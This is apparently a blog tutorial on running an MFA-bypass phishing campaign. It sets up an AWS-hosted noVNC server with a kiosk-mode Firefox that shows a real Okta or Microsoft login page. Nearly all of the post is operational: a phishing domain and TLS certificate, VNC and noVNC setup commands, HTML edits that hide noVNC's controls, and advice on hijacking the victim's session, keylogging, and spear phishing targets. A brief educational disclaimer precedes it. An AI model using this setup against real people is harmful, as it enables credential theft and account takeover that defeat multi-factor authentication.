MFA Phishing using noVNC and AWS
Disclaimer: The information provided on this blog is for educational and informational purposes only. The author does not support or condone any illegal or unethical behaviour, including but not limited to hacking. By accessing this blog, you agree to use the information solely for lawful and ethical purposes.
As Identity and Access Management (IdAM) solutions actively attempt to detect multi-factor authentication (MFA) based phishing tools like Evilginx2, I began researching alternatives and came across an excellent blog article from MrD0x at https://mrd0x.com/bypass-2fa-using-novnc/. All credit for this technique goes to him. This article provides guidance on how to set up a working campaign using AWS.
The idea behind this technique is to phish a user into visiting a noVNC server that you control as an attacker, running a browser in kiosk mode. The user then accesses a legitimate service, such as Okta or O365, and enters their credentials, including MFA. Following this, we can either kick the user and take over the session, keylog, or proxy all traffic.
EC2 Instance
Select a Ubuntu 22.04 LTS AMI with the t2.medium instance type as using noVNC is graphic intensive.
Security group
Enable inbound rules 22/tcp to SSH into the instance and 443/tcp to access the noVNC server.
DNS Setup using Route53
Register your phishing domain and under hosted zone create an A record pointing to the IP of the EC2 Instance you are running.
Setup certificate for TLS
sudo apt install certbot
sudo certbot certonly --standalone -d yourphishingdomain.com
Enter all the details to generate the certificate.
Make a of note of where the certificate and key is stored. Usually in /etc/letsencrypt/live/yourphishingdomain.com/
Install Tigervnc
sudo apt update
sudo apt install tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer
sudo apt install ubuntu-gnome-desktop
sudo systemctl enable gdm
sudo systemctl start gdm
Install dbus-x11
sudo apt install dbus-x11
There is a known blank screen issue which can be fixed by uncommenting:
WaylandEnable=false in the /etc/gdm3/custom.conf file.
Setup VNC password
vncpasswd
Create a really long password with random characters. This will come in handy later.
Create ~/.vnc/xstartup
#!/bin/sh
# Start Gnome 3 Desktop
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
vncconfig -iconic &
dbus-launch — exit-with-session gnome-session
Change permissions
chmod +x ~/.vnc/xstartup
Run vncserver
vncserver -depth 32 -geometry 2000x1000
Setup noVNC
git clone https://github.com/novnc/noVNC.git
Edit ./noVNC/vnc.html to modify the page title and make the following changes to remove the control bar and make the loading page white:
<div id=”noVNC_control_bar_anchor” class=”noVNC_vcenter” style=”display:none;”>
<div id=”noVNC_status” style=”display:none”></div>
<div id="noVNC_transition" style="background-color:white;color:white">
Copy the certificate and key previously generated to your home folder and then run:
sudo ./noVNC/utils/novnc_proxy --listen 443 --vnc 0.0.0.0:5901 --cert /home/ubuntu/cert/fullchain.pem --key /home/ubuntu/cert/privkey.pem
Install Firefox
wget -O ~/FirefoxSetup.tar.bz2 “https://download.mozilla.org/?product=firefox-latest&os=linux64"
sudo tar xjf ~/FirefoxSetup.tar.bz2 -C /opt/
sudo ln -s /opt/firefox/firefox /usr/bin/firefox
First, confirm that your setup is complete by accessing the noVNC server at https://yourphishingdomain.com/vnc.html?autoconnect=true&password=reallyreallylongpasswordwithrandomcharacters&resize=remote
Next, launch Firefox and set the homepage to the URL you want the user to visit (such as https://companyname.okta.com or https://login.microsoftonline.com).
Make sure to disable auto screen lock.
Close Firefox and restart it in kiosk mode.
firefox --kiosk
You can now share the phishing link with your target user.
As the attacker, you can monitor the user’s session in your own browser, but be careful when clicking your mouse. Remember that the user has remote access to the machine, so ensure that appropriate lockdown steps have been taken and that the user cannot escape kiosk mode. This technique is best suited for spear phishing a small number of users and is not recommended for larger campaigns. If you are targeting multiple users, consider running multiple VNC servers on different ports.